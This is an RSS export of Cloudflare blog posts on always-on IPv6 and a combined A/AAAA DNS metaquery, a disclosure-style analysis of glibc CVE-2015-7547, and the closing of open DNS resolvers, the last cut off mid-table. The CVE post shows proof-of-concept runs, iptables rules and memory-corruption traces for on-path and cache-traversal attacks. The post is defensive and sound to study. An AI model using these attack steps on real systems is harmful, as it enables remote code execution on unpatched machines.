
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Wed, 15 Apr 2026 21:12:26 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Less Is More - Why The IPv6 Switch Is Missing]]></title>
            <link>https://blog.cloudflare.com/always-on-ipv6/</link>
            <pubDate>Thu, 25 May 2017 17:30:00 GMT</pubDate>
            <description><![CDATA[ At Cloudflare we believe in being good to the Internet and good to our customers. By moving on from the legacy world of IPv4-only to the modern-day world where IPv4 and IPv6 are treated equally, we believe we are doing exactly that. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare we believe in being good to the Internet and good to our customers. By moving on from the legacy world of IPv4-only to the modern-day world where IPv4 and IPv6 are treated equally, we believe we are doing exactly that.</p><p><i>"No matter what happens in life, be good to people. Being good to people is a wonderful legacy to leave behind."</i> - Taylor Swift (whose website has been IPv6 enabled for many many years)</p><p>Starting today with free domains, IPv6 is no longer something you can toggle on and off, it’s always just on.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6UqOfN1xF7mt0PpJ1BbVCy/2d645cfd651e7722c6c0790f039a0aa0/before-after-ipv6.png" />
            
            </figure>
    <div>
      <h3>How we got here</h3>
    </div>
    <p>Cloudflare has always been a gateway for visitors on IPv6 connections to access sites and applications hosted on legacy IPv4-only infrastructure. Connections to Cloudflare are terminated on either IP version and then proxied to the backend over whichever IP version the backend infrastructure can accept.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7w5o9faqmZFjQSgXnYIVIP/49472b8b1f3eebc0682f3d7fd67eb4fb/ipv4-ipv6-translation-gateway.png" />
            
            </figure><p>That means that a v6-only mobile phone (looking at you, T-Mobile users) can establish a clean path to any site or mobile app behind Cloudflare instead of doing an expensive 464XLAT protocol translation as part of the connection (shaving milliseconds and conserving very precious battery life).</p><p>That IPv6 gateway is set by a simple toggle that for a while now has been default-on. And to make up for the time lost before the toggle was default-on, in August 2016 we went back retroactively and enabled IPv6 for those millions of domains that joined before IPv6 was the default. Over the next few months, we <a href="/98-percent-ipv6/">enabled IPv6 for nearly four million domains</a> –– you can see Cloudflare’s <a href="https://www.vyncke.org/ipv6status/plotsite.php?metric=w&amp;global=legacy&amp;pct=y">dent in the IPv6 universe</a> below –– and by the time we were done, 98.1% of all of our domains had IPv6 connectivity.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1yqnG0ahmUyEnfeUjLrqOi/083db64874e3322e8080e0c44183722e/plotsite.png" />
            
            </figure><p>As an interim step, we added an extra feature –– when you turn off IPv6 in our dashboard, we remind you just how archaic we think that is.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3oXyg84nb4l00KrDpmbrez/e7828711f44a4cf0fe78d16277d912be/modal.png" />
            
            </figure><p>With close to 100% IPv6 enablement, it no longer makes sense to offer an IPv6 toggle. Instead, Cloudflare is offering IPv6 always on, with no off-switch. We’re starting with free domains, and over time we’ll change the toggle on the rest of Cloudflare paid-plan domains.</p>
    <div>
      <h3>The Future: How Cloudflare and OpenDNS are working together to make IPv6 even faster and more globally deployed</h3>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6NjiPMVo4MsctGZW2P7RvI/b9dc657c93e35a5f7955b1378f1da61c/logos.png" />
            
            </figure><p>In November <a href="/98-percent-ipv6/">we published stats about the IPv6 usage</a> we see on the Cloudflare network in an attempt to answer who and what is pushing IPv6. The top operating systems by share of IPv6 traffic are iOS, ChromeOS, and macOS. These operating systems push significantly more IPv6 traffic than their peers because they use an address selection algorithm called Happy Eyeballs. Happy Eyeballs opportunistically chooses IPv6 when available by doing two <a href="https://www.cloudflare.com/learning/dns/what-is-dns/">DNS</a> lookups –– one for an IPv6 address (stored in the DNS AAAA record, pronounced quad-A) and one for the IPv4 address (stored in the DNS A record). Both DNS queries fly over the Internet at the same time, and the client chooses the address that comes back first. The client even gives IPv6 a few milliseconds’ head start (iOS and macOS give IPv6 lookups a 25ms head start, for example) so that IPv6 is chosen more often. This works and has fueled some of IPv6’s growth, but it has fallen short of the goal of a 100% IPv6 world.</p>
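<p>The racing behaviour described above can be sketched in a few lines of Python. This is an illustrative model of the selection logic, not any platform's actual implementation; the resolver callables and the 25ms default head start are stand-ins:</p>

```python
import concurrent.futures
import time

def happy_eyeballs(resolve_v6, resolve_v4, head_start=0.025):
    """Race an AAAA lookup against an A lookup, giving IPv6 a head start.

    resolve_v6/resolve_v4 are callables returning an address string;
    whichever finishes first wins, with ties going to IPv6.
    """
    with concurrent.futures.ThreadPoolExecutor(max_workers=2) as pool:
        f6 = pool.submit(resolve_v6)
        time.sleep(head_start)          # IPv6 gets its head start here
        f4 = pool.submit(resolve_v4)
        done, _ = concurrent.futures.wait(
            [f6, f4], return_when=concurrent.futures.FIRST_COMPLETED)
        # Prefer the AAAA answer if it is among the finished lookups.
        return f6.result() if f6 in done else next(iter(done)).result()
```

<p>With a fast AAAA lookup, the IPv6 address wins even when the A lookup is instantaneous, which is exactly the bias the head start is designed to create.</p>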
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/27vp45uqt2lIMVqjzndv86/f6136dbc91d329894a131433df044bfb/A-AAAA.png" />
            
            </figure><p>While there are perfectly good historical reasons why IPv6 and IPv4 addresses are stored in separate DNS record types, today’s clients are IP version agnostic, and it no longer makes sense to require two separate round trips to learn which addresses are available for a resource.</p><p>Alongside OpenDNS, we are testing a new idea: what if you could ask for all the addresses in just one DNS query?</p><p>With OpenDNS, we are prototyping and testing just that –– a new DNS metatype that returns all available addresses in one DNS answer: A records and AAAA records in one response. (A metatype is a query type that end users can’t add to their DNS zone file; it’s assembled dynamically by the authoritative nameserver.)</p><p>What this means is that in the future, if a client like an iPhone wants to access a mobile app that uses Cloudflare DNS or another DNS provider that supports the spec, the iPhone’s DNS client would only need to do one DNS lookup to find where the app’s API server is located, cutting the number of necessary round trips in half.</p><p>This reduces the amount of bandwidth on the DNS system and pre-populates global DNS caches with IPv6 addresses, making IPv6 lookups faster in the future. A side benefit is that Happy Eyeballs clients prefer IPv6 when they can get the address quickly, which increases the amount of IPv6 traffic that flows through the Internet.</p><p>We have the metaquery working in code with the reserved TYPE65535 query type. You can ask a Cloudflare nameserver for TYPE65535 of any domain on Cloudflare and get back all available addresses for that name.</p>
            <pre><code>$ dig cloudflare.com @ns1.cloudflare.com -t TYPE65535 +short
198.41.215.162
198.41.214.162
2400:cb00:2048:1::c629:d6a2
2400:cb00:2048:1::c629:d7a2
$</code></pre>
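<p>Any client that can emit a raw query type can ask for this metatype, since the question section simply carries the numeric type. As an illustrative sketch (a hand-rolled wire format, not a production resolver), here is how a TYPE65535 question is encoded:</p>

```python
import struct

def build_query(name, qtype, qid=0x1234):
    """Encode a minimal DNS query (RFC 1035 wire format) for any qtype."""
    # 12-byte header: id, flags (RD=1), QDCOUNT=1, AN/NS/AR counts = 0
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"                                   # root label terminator
    return header + qname + struct.pack("!HH", qtype, 1)  # qtype, class IN

# The experimental "all addresses" metaquery uses the reserved type 65535.
packet = build_query("cloudflare.com", 65535)
```

<p>The on-the-wire difference from an ordinary A or AAAA query is nothing more than those two qtype octets; the interesting work all happens on the authoritative server.</p>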
            <p>Did we mention Taylor Swift earlier?</p>
            <pre><code>$ dig taylorswift.com @ns1.cloudflare.com -t TYPE65535 +short
104.16.193.61
104.16.194.61
104.16.191.61
104.16.192.61
104.16.195.61
2400:cb00:2048:1::6810:c33d
2400:cb00:2048:1::6810:c13d
2400:cb00:2048:1::6810:bf3d
2400:cb00:2048:1::6810:c23d
2400:cb00:2048:1::6810:c03d
$</code></pre>
            <p>We believe in proving concepts in code and through the <a href="https://ietf.org/">IETF</a> standards process. We’re currently working on an experiment with OpenDNS and will translate what we learn into an Internet Draft that we will submit to the IETF to become an RFC. We’re sure this is just the beginning of faster, better-deployed IPv6.</p> ]]></content:encoded>
            <category><![CDATA[IPv4]]></category>
            <category><![CDATA[IPv6]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">6GuglMyL4s8AnqoL9NOliF</guid>
            <dc:creator>Dani Grant</dc:creator>
        </item>
        <item>
            <title><![CDATA[A tale of a DNS exploit: CVE-2015-7547]]></title>
            <link>https://blog.cloudflare.com/a-tale-of-a-dns-exploit-cve-2015-7547/</link>
            <pubDate>Mon, 29 Feb 2016 13:42:19 GMT</pubDate>
            <description><![CDATA[ A buffer overflow error in GNU libc DNS stub resolver code was announced last week as CVE-2015-7547. While it doesn't have any nickname yet (last year's Ghost was more catchy), it is potentially disastrous. ]]></description>
            <content:encoded><![CDATA[ <p><i>This post was written by Marek Vavruša and Jaime Cochran, who found out they were both independently working on the same glibc vulnerability attack vectors at 3am last Tuesday.</i></p><p>A buffer overflow error in GNU libc DNS stub resolver code was <a href="https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html">announced last week</a> as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547">CVE-2015-7547</a>. While it doesn't have any nickname yet (last year's <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235">Ghost</a> was more catchy), it is potentially disastrous as it affects any platform with recent GNU libc—CPEs, load balancers, servers and personal computers alike. The big question is: how exploitable is it in the real world?</p><p>It turns out that the only mitigation that works is patching. Please patch your systems <i>now</i>, then come back and read this blog post to understand why attempting to mitigate this attack by limiting DNS response sizes does not work.</p><p>But first, patch!</p>
    <div>
      <h3>On-Path Attacker</h3>
    </div>
    <p>Let's start with the <a href="https://github.com/fjserna/CVE-2015-7547">PoC from Google</a>; it uses the first attack vector described in the vulnerability announcement. First, a 2048-byte UDP response forces buffer allocation, then a failure response forces a retry, and finally the last two answers smash the stack.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo python poc.py &amp;
$ valgrind curl http://foo.bar.google.com
==17897== Invalid read of size 1
==17897==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==17897==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==17897==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==17897==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==17897==    by 0x4242424242424241: ???
==17897==  Address 0x4242424242424245 is not stack'd, malloc'd or (recently) free'd
Segmentation fault</code></pre>
            <p>This proof of concept requires the attacker to talk to the glibc stub resolver code either directly or through a simple forwarder. This situation arises when your DNS traffic is intercepted or when you’re using an untrusted network.</p><p>One of the suggested mitigations in the announcement was to limit UDP response size to 2048 bytes, and TCP responses to 1024 bytes. Limiting UDP is, with all due respect, completely ineffective and only forces legitimate queries to retry over TCP. Limiting TCP answers is a plain protocol violation that cripples legitimate answers:</p>
            <pre><code>$ dig @b.gtld-servers.net +tcp +dnssec NS root-servers.net | grep "MSG SIZE"
;; MSG SIZE  rcvd: 1254</code></pre>
            <p>Regardless, let's see if response size clipping is effective at all. When calculating size limits, we have to take the IPv4 header into account (20 octets), plus the UDP header overhead (8 octets), leading to a maximum allowed datagram size of 2076 octets. DNS/TCP may arrive fragmented—for the sake of argument, let's drop DNS/TCP altogether.</p>
            <pre><code>$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP
$ sudo iptables -I INPUT -p tcp --sport 53 -j DROP
$ valgrind curl http://foo.bar.google.com
curl: (6) Could not resolve host: foo.bar.google.com</code></pre>
            <p>Looks like we've mitigated the first attack method, albeit with collateral damage. But what about the UDP-only <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-udponly-py">proof of concept</a>?</p>
            <pre><code>$ echo "nameserver 127.0.0.10" | sudo tee /etc/resolv.conf
$ sudo python poc-udponly.py &amp;
$ valgrind curl http://foo.bar.google.com
==18293== Syscall param socketcall.recvfrom(buf) points to unaddressable byte(s)
==18293==    at 0x4F1E8C3: __recvfrom_nocancel (syscall-template.S:81)
==18293==    by 0x59FBFD0: send_dg (res_send.c:1259)
==18293==    by 0x59FBFD0: __libc_res_nsend (res_send.c:557)
==18293==    by 0x59F9C0B: __libc_res_nquery (res_query.c:227)
==18293==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18293==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18293==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18293==    by 0x4F08AA0: gaih_inet (getaddrinfo.c:862)
==18293==    by 0x4F0AC4C: getaddrinfo (getaddrinfo.c:2418)
==18293==  Address 0xfff001000 is not stack'd, malloc'd or (recently) free'd
*** Error in `curl': double free or corruption (out): 0x00007fe7331b2e00 ***
Aborted</code></pre>
            <p>While it's not possible to ship a whole attack payload in a 2048-byte UDP response, it still leads to memory corruption. When the announcement suggested blocking DNS UDP responses larger than 2048 bytes as a viable mitigation, it confused a <a href="https://blog.des.no/2016/02/freebsd-and-cve-2015-7547/">lot of people</a>, including other <a href="http://blog.powerdns.com/2016/02/17/powerdns-cve-2015-7547-possible-mitigation/">DNS vendors</a> and ourselves. This and the following proof of concept show that it's not only futile, but harmful in the long term if these rules are left enabled.</p><p>So far, the presented attacks have required a MitM scenario, where the attacker talks to a glibc resolver directly. A "good enough" mitigation is to run a local caching resolver to isolate glibc code from the attacker. In fact, doing so not only improves Internet performance with a local cache, but also prevents past and possibly future security vulnerabilities.</p>
    <div>
      <h4>Is a caching stub resolver really good enough?</h4>
    </div>
    <p>Unfortunately, no. A local stub resolver such as <a href="http://www.thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a> alone is not sufficient to defuse this attack. It's easy to traverse, as it doesn't scrub upstream answers—let's see if the attack goes through with a <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-dnsmasq-py">modified proof of concept</a> that uses only well-formed answers and zero time-to-live (TTL) for cache traversal.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo dnsmasq -d -a 127.0.0.1 -R -S 127.0.0.10 -z &amp;
$ sudo python poc-dnsmasq.py &amp;
$ valgrind curl http://foo.bar.google.com
==20866== Invalid read of size 1
==20866==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==20866==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==20866==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==20866==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==20866==    by 0x1C000CC04D4D4D4C: ???
Killed</code></pre>
            <p>The big question is—now that we've seen that the mitigation strategies for MitM attacks are provably ineffective, can we exploit the flaw off-path through a caching DNS resolver?</p>
    <div>
      <h3>An off-path attack scenario</h3>
    </div>
    <p>Let's start with the first phase of the attack—a compliant resolver is never going to give out a response larger than 512 bytes over UDP to a client that doesn't support EDNS0. Since the glibc resolver doesn't advertise EDNS0 by default, we have to escalate to TCP and perform the whole attack there. Also, the client should have at least two nameservers configured; otherwise, mounting a successful attack is more complicated.</p>
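<p>The 512-byte ceiling is what makes the TCP escalation inevitable. A compliant server's truncation decision boils down to the following sketch (illustrative; the function names are ours):</p>

```python
def udp_payload_limit(edns0_bufsize=None):
    """Max UDP payload a compliant server will send: 512 bytes per
    RFC 1035, raised only when the client advertises an EDNS0 buffer
    size (RFC 6891)."""
    return edns0_bufsize if edns0_bufsize else 512

def must_truncate(answer_len, edns0_bufsize=None):
    # Oversized answer: set TC=1 and let the client retry over TCP.
    return answer_len > udp_payload_limit(edns0_bufsize)
```

<p>Since the glibc stub does not advertise an EDNS0 buffer size by default, any answer over 512 bytes comes back truncated, and the whole exchange, attack included, moves to TCP.</p>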
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo iptables -F INPUT
$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP</code></pre>
            <p>Let's try it with a <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-tcponly-py">proof of concept</a> that merges both the DNS proxy and the attacker.</p><ol><li><p>The DNS proxy on localhost asks the attacker both queries over UDP, and the attacker responds with the TC flag set to force the client to retry over TCP.</p></li><li><p>The attacker responds once with a TCP response of 2049 bytes or longer, then forces the proxy to close the TCP connection to the glibc resolver code. <i>This is a critical step with no reliable way to achieve it.</i></p></li><li><p>The attacker sends back a full attack payload, which the proxy happily forwards to the glibc resolver client.</p></li></ol>
            <pre><code>$ sudo python poc-tcponly.py &amp;
$ valgrind curl http://foo.bar.google.com
==18497== Invalid read of size 1
==18497==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==18497==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18497==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18497==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18497==    by 0x1C000CC04D4D4D4C: ???
==18497==  Address 0x1000000000000103 is not stack'd, malloc'd or (recently) free'd
Killed</code></pre>
            
    <div>
      <h3>Performing the attack over a real resolver</h3>
    </div>
    <p>The key to a real-world non-MitM cache resolver attack is to control the messages between the resolver and the client indirectly. We came to the conclusion that djbdns’ dnscache was the best target for attempting to illustrate an actual cache traversal.</p><p>In order to fend off DoS attack vectors like <a href="https://en.wikipedia.org/wiki/Slowloris_(computer_security)">slowloris</a>, which makes numerous simultaneous TCP connections and holds them open to clog up a service, DNS resolvers keep a finite pool of parallel TCP connections. This is usually achieved by capping the number of parallel TCP connections and closing the oldest or least-recently active one. For example, djbdns (dnscache) holds up to 20 parallel TCP connections, then starts dropping them, starting from the oldest. Knowing this, we realised we could terminate TCP connections with ease. Thus, one security fix becomes another bug’s treasure.</p><p>To exploit this, the attacker sends a truncated UDP A+AAAA query, which triggers the necessary retry over TCP. The attacker responds with a valid answer with a TTL of 0, and dnscache sends the glibc client a truncated UDP response. At this point, the glibc function <code>send_vc()</code> retries with dnscache over TCP, and since the previous answer's TTL was 0, dnscache asks the attacker’s server for the A+AAAA query again. The attacker responds to the A query with an answer larger than 2000 bytes to induce glibc's buffer mismanagement, and dnscache then forwards it to the client. Now the attacker can either wait out the AAAA query while other clients make perfectly legitimate requests, or instead make 20 TCP connections back to dnscache until dnscache terminates the attacker's connection.</p><p>Now that we’ve met all the conditions to trigger another retry, the attacker sends back any valid A response and a valid, oversized AAAA response that carries the payload (either in a CNAME or in AAAA RDATA); dnscache tosses this back to the client, triggering the overflow.</p><p>It seems like a complicated process, but it really is not. Let’s have a look at our <a href="https://gist.github.com/vavrusa/689b48d2d6c16759fc85">proof-of-concept</a>:</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo python poc-dnscache.py
[TCP] Sending back first big answer with TTL=0
[TCP] Sending back second big answer with TTL=0
[TCP] Preparing the attack with an answer &gt;2k
[TCP] Connecting back to caller to force it close original connection('127.0.0.1', 53)
[TCP] Original connection was terminated, expecting to see requery...
[TCP] Sending back a valid answer in A
[TCP] Sending back attack payload in AAAA</code></pre>
            <p>Client:</p>
            <pre><code>$ valgrind curl https://www.cloudflare.com/
==6025== Process terminating with default action of signal 11 (SIGSEGV)
==6025==  General Protection Fault
==6025==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==6025==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==6025==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==6025==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==6025==    by 0x1C000CC04D4D4D4C: ???
Killed</code></pre>
            <p>This PoC was made simply to illustrate that <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">remote code execution</a> via DNS resolver cache traversal is not only possible, but plausible. So, patch. Now.</p><p>We reached out to <a href="https://www.opendns.com">OpenDNS</a>, knowing they had used djbdns as part of their codebase. They investigated and verified that this particular attack does not affect their resolvers.</p>
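<p>The eviction behaviour the attack leans on can be modelled in a few lines. This is a toy model of the dnscache policy described above (the oldest connection is dropped once the pool is full), not djbdns source:</p>

```python
from collections import OrderedDict

class TcpConnPool:
    """Hold at most `limit` parallel TCP connections; when a new one
    arrives and the pool is full, evict the oldest (dnscache-style)."""
    def __init__(self, limit=20):
        self.limit = limit
        self.conns = OrderedDict()   # insertion order == age order

    def accept(self, conn_id):
        evicted = None
        if len(self.conns) >= self.limit:
            evicted, _ = self.conns.popitem(last=False)  # oldest first
        self.conns[conn_id] = True
        return evicted
```

<p>An attacker who opens enough fresh connections is therefore guaranteed to push an earlier connection, such as the one carrying the glibc client's query, out of the pool.</p>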
    <div>
      <h4>How accidental defenses saved the day</h4>
    </div>
    <p>Dan Kaminsky wrote <a href="http://dankaminsky.com/2016/02/20/skeleton/">a thoughtful blog post</a> about scoping this issue. He argues:</p><blockquote><p>I’m just going to state outright: Nobody has gotten this glibc flaw to work through caches yet. So we just don’t know if that’s possible. Actual exploit chains are subject to what I call the MacGyver effect.</p></blockquote><p>Current resolvers scrub and sanitize final answers, so the attack payload must be encoded in a well-formed DNS answer to survive a pass through the resolver. In addition, only some record types are safely left intact—as the attack payload is carried in the AAAA query, only AAAA records in the answer section are safe from being scrubbed, forcing the attacker to encode the payload in these. One way to circumvent this limitation is to use a CNAME record, where the attack payload may be encoded in the CNAME target (a maximum of 255 octets).</p><p>The only good mitigation is to run a DNS resolver on <i>localhost</i>, where the attacker can't introduce resource exhaustion, or at least to enforce a minimum cache TTL to defuse the waiting-game attack.</p>
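<p>The 255-octet ceiling on a CNAME target is a hard wire-format limit, which is what constrains a CNAME-smuggled payload. A quick check of the bounds, per RFC 1035 (illustrative helper functions):</p>

```python
def wire_length(name):
    """Length of a domain name in DNS wire format: one length octet per
    label plus the label bytes, plus the terminating root label."""
    labels = name.rstrip(".").split(".")
    return sum(len(label) + 1 for label in labels) + 1

def fits_in_cname_target(name):
    # RFC 1035 bounds: each label at most 63 octets, whole name at most
    # 255 octets on the wire.
    labels = name.rstrip(".").split(".")
    return (wire_length(name) <= 255
            and all(1 <= len(label) <= 63 for label in labels))
```

<p>Any payload the attacker smuggles through a scrubbing resolver this way has to fit those bounds, which is a real constraint on shellcode-sized data.</p>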
    <div>
      <h3>Takeaway</h3>
    </div>
    <p>You might think it's unlikely that you could become a MitM target, but the fact is that you <i>already are</i>. If you have ever used public Wi-Fi in an airport, hotel or café, you may have noticed being redirected to a captive portal for authentication purposes. This is a temporary <a href="https://www.cloudflare.com/learning/security/global-dns-hijacking-threat/">DNS hijacking</a> that redirects you to an internal portal until you agree to the terms and conditions. What's even worse is a permanent DNS interception that you don't notice until you look at the actual answers. This happens on a daily basis, and it takes only a single name lookup to trigger the flaw.</p><p>Neither DNSSEC nor independent public resolvers prevent it, as the attack happens between the stub and the recursor on the <i>last mile</i>. The recent flaws highlight the fragility of not only legacy glibc code, but also stubs <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3484">in general</a>. DNS is a deceptively complicated protocol and should be treated carefully. A generally good mitigation is to shield yourself with a local caching DNS resolver<a href="#resolvers"><sup>1</sup></a>, or at least a <a href="https://dnscrypt.org">DNSCrypt</a> tunnel. Arguably, there might be a vulnerability in the resolver as well, but it is contained to the daemon itself—not to everything using the C library (e.g., sudo).</p>
    <div>
      <h3>Are you affected?</h3>
    </div>
    <p>If you're running GNU libc between 2.9 and 2.22, then yes. Below is an informative list of several major platforms affected.</p><table><tr><td><p><b>Platform</b></p></td><td><p><b>Notice</b></p></td><td><p><b>Status</b></p></td></tr><tr><td><p>Debian</p></td><td><p><a href="https://security-tracker.debian.org/tracker/CVE-2015-7547">CVE-2015-7547</a></p></td><td><p>Patched packages available (squeeze and newer)</p></td></tr><tr><td><p>Ubuntu</p></td><td><p><a href="http://www.ubuntu.com/usn/usn-2900-1/">USN-2900-1</a></p></td><td><p>Patched packages available (14.04 and newer)</p></td></tr><tr><td><p>RHEL</p></td><td><p><a href="https://access.redhat.com/articles/2161461">KB2161461</a></p></td><td><p>Patched packages available (RHEL 6-7)</p></td></tr><tr><td><p>SUSE</p></td><td><p><a href="https://www.suse.com/support/update/announcement/2016/suse-su-20160472-1.html">SUSE-SU-2016:0472-1</a></p></td><td><p>Patched packages available (latest)</p></td></tr><tr><td><p>Network devices &amp; CPEs</p></td><td><p><a href="https://www.reddit.com/r/networking/comments/46jfjf/cve20157547_mega_thread/">Updated list of affected platforms</a></p></td><td><p></p></td></tr></table><p>The toughest problem with this issue is the long tail of custom CPEs and IoT devices, which can't really be enumerated. Consult the manufacturer's website for vulnerability disclosures. Keep in mind that if your CPE is affected by remote code execution, its network can no longer be treated as safe.</p><p>If you're running OS X, iOS, Android or any BSD flavour<a href="#bsd-affected"><sup>2</sup></a>, you're not affected.</p><ul><li><p>[1] Take a look at <a href="https://www.unbound.net">Unbound</a>, <a href="https://www.powerdns.com/recursor.html">PowerDNS Recursor</a> or <a href="https://www.knot-resolver.cz">Knot DNS Resolver</a> for a compliant validating resolver.</p></li><li><p>[2] Applications running under Linux emulation and using glibc may be affected; make sure to update ports.</p></li></ul> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Programming]]></category>
            <guid isPermaLink="false">1lupmQh30nM3wtSJrCOh95</guid>
            <dc:creator>Marek Vavruša</dc:creator>
            <dc:creator>Jaime Cochran</dc:creator>
        </item>
        <item>
            <title><![CDATA[Good Web Security News: Open DNS Resolvers Are Getting Closed]]></title>
            <link>https://blog.cloudflare.com/good-news-open-dns-resolvers-are-getting-clos/</link>
            <pubDate>Fri, 22 Feb 2013 21:12:00 GMT</pubDate>
            <description><![CDATA[ This has been a rough week in the security industry with big attacks and compromises reported at companies from Facebook to Apple.  ]]></description>
            <content:encoded><![CDATA[ <p>This has been a rough week in the security industry, with big attacks and compromises reported at companies from Facebook to Apple. We're therefore happy to end the week with some good news: the web's open resolvers, one of the sources of the biggest DDoS attacks, are getting closed.</p>
    <div>
      <h3>Sad State of Affairs</h3>
    </div>
    <p>Last October, we wrote a <a href="/deep-inside-a-dns-amplification-ddos-attack">blog post about DDoS amplification attacks</a>. This type of attack accounts for some of the largest DDoS attacks CloudFlare sees, sometimes exceeding 100 gigabits per second (100Gbps). The attacks use DNS resolvers that haven't been properly secured in order to "amplify" the resources of the attacker. An attacker can achieve more than 50x amplification, meaning that for every byte they are able to generate themselves, they can pummel a victim with 50 bytes of garbage data.</p><p>The problem stems from misconfigured DNS resolver software (e.g., BIND) that is set up to respond to queries from any IP address. Since DNS requests are typically sent over UDP, which, unlike TCP, does not require a handshake, an attacker can spoof a victim's IP address as the source address in a packet, and a misconfigured DNS resolver will happily bombard the victim with responses.</p>
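<p>The amplification arithmetic is simple. As a sketch, with the packet sizes below chosen purely as illustrative examples (a small spoofed query drawing a large answer):</p>

```python
def amplification_factor(query_bytes, response_bytes):
    """Bytes delivered to the victim per byte the attacker sends:
    the attacker pays for the query, the open resolver pays for the
    (much larger) response aimed at the spoofed source address."""
    return response_bytes / query_bytes

# Example sizes only: a ~64-byte spoofed query drawing a
# 3,200-byte answer yields a 50x multiplier.
factor = amplification_factor(64, 3200)
```

<p>This is why even a modest botnet behind open resolvers can generate the 100Gbps floods described above.</p>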
    <div>
      <h3>Closing the Open Resolvers</h3>
    </div>
    <p>While CloudFlare's network is very good at absorbing even these large attacks, the long term solution for the web is for providers to clean up the open resolvers running on their networks. We wanted to help with that, so we engaged in a bit of name-and-shame at the end of the last blog post, listing the networks with the largest number of open resolvers. The good news is it worked: almost four months later our tests show that the number of open resolvers across the Internet is down more than 30%. The chart below shows the progress individual networks have made in cleaning up the problem.</p><table><tr><td><p><b>ASN</b></p></td><td><p><b>Network</b></p></td><td><p><b>10/30/12</b></p></td><td><p><b>2/22/13</b></p></td><td><p><b>% Change</b></p></td></tr><tr><td><p>21844 </p></td><td><p>THEPLANET-AS - ThePlanet.com Internet Services, In</p></td><td><p>2925</p></td><td><p>2216</p></td><td><p>-24%</p></td></tr><tr><td><p>3462 </p></td><td><p>HINET Data Communication Business Group</p></td><td><p>2739</p></td><td><p>2213</p></td><td><p>-19%</p></td></tr><tr><td><p>36351 </p></td><td><p>SOFTLAYER - SoftLayer Technologies Inc.</p></td><td><p>1075</p></td><td><p>781</p></td><td><p>-27%</p></td></tr><tr><td><p>9394 </p></td><td><p>CRNET CHINA RAILWAY Internet(CRNET)</p></td><td><p>1052</p></td><td><p>774</p></td><td><p>-26%</p></td></tr><tr><td><p>4713 </p></td><td><p>OCN NTT Communications 